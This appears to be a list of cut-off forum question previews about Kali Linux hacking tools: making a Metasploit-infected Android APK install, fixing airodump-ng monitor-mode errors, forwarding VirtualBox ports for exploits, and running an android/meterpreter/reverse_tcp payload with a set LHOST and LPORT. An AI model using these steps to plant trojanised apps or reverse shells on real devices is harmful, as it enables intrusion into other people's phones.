I created a metasploit infected .apk, i downloaded it to my phone but when I try to run it I get a parsing error help please? PS: Last time I got it to work It tokeme like 15 generated apks and only 1 installed help.
BTW: I'm using kali on virtual box So I was trying to do start airodump-ng using mon0 and it give the folowing error: "No such Device" I did this: airmon-ng start wlan0 airmon-ng check kill airodump-ng mon0 And it gave me this error: "failed: No such device" For a more clear ...more
I need to forward some ports to use some exploits in kali linux, I have Kali Linux instaled in a virtual box any way of forward ports to virtual box ipv4 (BY DEFAUT 10.0.0.25) Or to make virtual box use their own ipv4???
So I installed metasploit on my windows 10, and I was trying to start an android exploit (android/meterpreter/reversetcp). So I started by typing: use android/meterpreter/reversetcp set PAYLOAD android/meterpreter/reversetcp set LHOST 192.168.1.12 set LPORT 443 exploit; but ...more